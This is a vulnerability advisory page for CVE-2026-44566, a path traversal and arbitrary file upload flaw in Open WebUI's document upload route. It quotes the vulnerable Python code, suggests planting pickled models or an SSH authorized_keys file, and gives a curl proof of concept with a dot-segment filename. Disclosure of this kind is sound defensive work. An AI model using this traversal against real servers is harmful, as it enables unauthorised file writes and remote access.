CVE-2026-44566: Open WebUI: Arbitrary File Upload and Path Traversal

Published May 8, 2026
·
Updated

CONFIDENTIAL

KL-CAN-2024-002

Vulnerability Details

| # | Field | Value | |---|-------|-------| | 1 | Discoverer | Jaggar Henry & Sean Segreti of KoreLogic, Inc. | | 2 | Date Submitted | 2024.03.12 | | 3 | Title | Open WebUI Arbitrary File Upload + Path Traversal | | 5 | Affected Vendor | Open WebUI | | 6 | Affected Product(s) | Open WebUI (Formerly Ollama WebUI) | | 7 | Affected Version(s) | 0.1.105 | | 8 | Platform/OS | Debian GNU/Linux 12 (bookworm) | | 9 | Vector | HTTP web interface | | 10 | CWE | CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type |

---

4. High-level Summary

Attacker controlled files can be uploaded to arbitrary locations on the web server's filesystem by abusing a path traversal vulnerability.

---

11. Technical Analysis

When attaching files to a prompt by clicking the plus sign (+) on the left of the message input box when using the Open WebUI HTTP interface, the file is uploaded to a static upload directory.

The name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission.

This can be visualized by examining the python code for the /rag/api/v1/doc API route:

python @app.post("/doc") def storedoc( collectionname: Optional[str] = Form(None), file: UploadFile = File(...), user=Depends(getcurrentuser), ): # "https://www.gutenberg.org/files/1727/1727-h/1727-h.htm"

print(file.contenttype) try: filename = file.filename filepath = f"{UPLOADDIR}/{filename}" contents = file.file.read() with open(filepath, "wb") as f: f.write(contents) f.close()

The file variable is a representation of the multipart form data contained within the HTTP POST request. The filename variable is derived from the uploaded file name and is not validated before writing the file contents to disk.

This can be used to upload malicious models. These models are often distributed as pickled python objects and can be leveraged to execute arbitrary python bytecode once deserialized. Alternatively, an attacker can leverage existing services, such as SSH, to upload an attacker controlled authorizedkeys file to remotely connect to the machine.

---

12. Proof-of-Concept

Execute the following cURL command:

bash TARGETURI='https://redacted.com'; JWT='redacted'; LOCALFILE='/tmp/filetoupload.txt'\ curl -H "Authorization: Bearer $JWT" -F "file=$LOCALFILE;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGETURI/rag/api/v1/doc"

Verify the file pwned.txt exists in the /tmp/ directory on the machine hosting the web server:

console ollama@webserver:~$ cat /tmp/pwned.txt korelogic ollama@webserver:~$

Other sources

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, when attaching files to a promp, the name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission. This vulnerability is fixed in 0.1.124.

MITRE

Affected Software

2 affected componentsFixes available
pip/open-webui<=0.1.123
0.1.124
openwebui Open WebUI<0.1.124

Event History

May 8, 2026
Advisory Published
via GitHub·10:38 PM
Data Sourced
via GitHub·10:38 PM
DescriptionSeverityWeaknessAffected Software
May 15, 2026
CVE Published
via MITRE·09:01 PM
Data Sourced
via MITRE·09:01 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·10:16 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-44566?

CVE-2026-44566 is classified as a high severity vulnerability due to its potential for arbitrary file upload and path traversal.

2

How do I fix CVE-2026-44566?

To fix CVE-2026-44566, upgrade the open-webui package to version 0.1.124 or later.

3

What software is affected by CVE-2026-44566?

CVE-2026-44566 affects the open-webui package versions up to and including 0.1.123.

4

Who discovered CVE-2026-44566?

CVE-2026-44566 was discovered by Jaggar Henry and Sean Segreti of KoreLogic, Inc.

5

When was CVE-2026-44566 submitted?

CVE-2026-44566 was submitted on March 12, 2024.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203